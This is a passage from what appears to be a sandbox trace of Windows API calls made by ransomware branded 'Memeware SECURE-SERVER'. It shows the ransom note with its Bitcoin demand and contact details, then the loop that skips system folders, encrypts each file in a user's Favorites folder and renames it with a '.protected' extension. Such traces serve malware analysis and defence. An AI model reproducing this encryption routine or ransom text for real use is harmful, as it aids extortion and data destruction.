SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.780] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.781] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.781] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.781] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.781] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.782] CloseHandle (hObject=0xb4) returned 1 [0091.790] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.790] lstrcmpiW (lpString1="Microsoft Websites", lpString2="Windows") returned -1 [0091.790] lstrcmpiW (lpString1="Microsoft Websites", lpString2="Program Files") returned -1 [0091.790] lstrcmpiW (lpString1="Microsoft Websites", lpString2="Program Files (x86)") returned -1 [0091.790] lstrcmpiW (lpString1="Microsoft Websites", lpString2="$Recycle.bin") returned 1 [0091.790] lstrcmpiW (lpString1="Microsoft Websites", lpString2="System Volume Information") returned -1 [0091.791] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 62 [0091.791] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0091.791] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0091.791] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*") returned 64 [0091.791] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.800] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.800] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.800] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.800] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.800] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.800] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\.") returned 64 [0091.800] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.800] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.800] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.801] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.801] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.801] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.801] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.801] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\..") returned 65 [0091.801] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.801] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.801] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Windows") returned -1 [0091.801] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Program Files") returned -1 [0091.801] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Program Files (x86)") returned -1 [0091.801] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="$Recycle.bin") returned 1 [0091.801] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="System Volume Information") returned -1 [0091.801] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0091.801] StrStrIW (lpFirst="IE Add-on site.url", lpSrch=".protected") returned 0x0 [0091.801] lstrcmpW (lpString1="IE Add-on site.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.801] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.801] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.802] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0091.802] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".txt") returned 0x0 [0091.802] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0091.802] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".rar") returned 0x0 [0091.802] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0091.802] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".zip") returned 0x0 [0091.802] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.803] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.803] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.803] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.803] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.803] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.804] CloseHandle (hObject=0xd4) returned 1 [0091.804] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.protected") returned 91 [0091.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.protected")) returned 1 [0091.805] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.805] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Windows") returned -1 [0091.805] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Program Files") returned -1 [0091.805] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Program Files (x86)") returned -1 [0091.805] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="$Recycle.bin") returned 1 [0091.806] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="System Volume Information") returned -1 [0091.806] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0091.806] StrStrIW (lpFirst="IE site on Microsoft.com.url", lpSrch=".protected") returned 0x0 [0091.806] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.806] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.806] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0091.806] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".txt") returned 0x0 [0091.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0091.806] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".rar") returned 0x0 [0091.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0091.806] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".zip") returned 0x0 [0091.806] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.807] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.807] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.808] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.808] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.808] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.808] CloseHandle (hObject=0xd4) returned 1 [0091.809] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.protected") returned 101 [0091.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.protected")) returned 1 [0091.810] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.810] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Windows") returned -1 [0091.810] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Program Files") returned -1 [0091.810] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Program Files (x86)") returned -1 [0091.810] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="$Recycle.bin") returned 1 [0091.810] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="System Volume Information") returned -1 [0091.810] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0091.810] StrStrIW (lpFirst="Microsoft At Home.url", lpSrch=".protected") returned 0x0 [0091.810] lstrcmpW (lpString1="Microsoft At Home.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.810] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.810] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.811] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0091.811] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".txt") returned 0x0 [0091.811] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0091.811] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".rar") returned 0x0 [0091.811] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0091.811] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".zip") returned 0x0 [0091.811] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.812] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.812] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.812] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.812] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.813] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.813] CloseHandle (hObject=0xd4) returned 1 [0091.813] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.protected") returned 94 [0091.814] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.protected")) returned 1 [0091.824] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.824] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Windows") returned -1 [0091.824] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Program Files") returned -1 [0091.824] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Program Files (x86)") returned -1 [0091.824] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="$Recycle.bin") returned 1 [0091.824] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="System Volume Information") returned -1 [0091.825] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0091.825] StrStrIW (lpFirst="Microsoft At Work.url", lpSrch=".protected") returned 0x0 [0091.825] lstrcmpW (lpString1="Microsoft At Work.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.825] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.825] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.825] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0091.826] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".txt") returned 0x0 [0091.826] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0091.826] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".rar") returned 0x0 [0091.826] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0091.826] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".zip") returned 0x0 [0091.826] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.827] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.827] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.827] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.828] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.828] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.828] CloseHandle (hObject=0xd4) returned 1 [0091.830] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.protected") returned 94 [0091.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.protected")) returned 1 [0091.831] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.831] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Windows") returned -1 [0091.831] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Program Files") returned -1 [0091.831] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Program Files (x86)") returned -1 [0091.831] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="$Recycle.bin") returned 1 [0091.831] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="System Volume Information") returned -1 [0091.831] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0091.831] StrStrIW (lpFirst="Microsoft Store.url", lpSrch=".protected") returned 0x0 [0091.832] lstrcmpW (lpString1="Microsoft Store.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.832] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.832] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.852] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0091.852] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".txt") returned 0x0 [0091.852] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0091.852] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".rar") returned 0x0 [0091.852] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0091.852] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".zip") returned 0x0 [0091.852] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x86, lpOverlapped=0x0) returned 1 [0091.853] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7a, 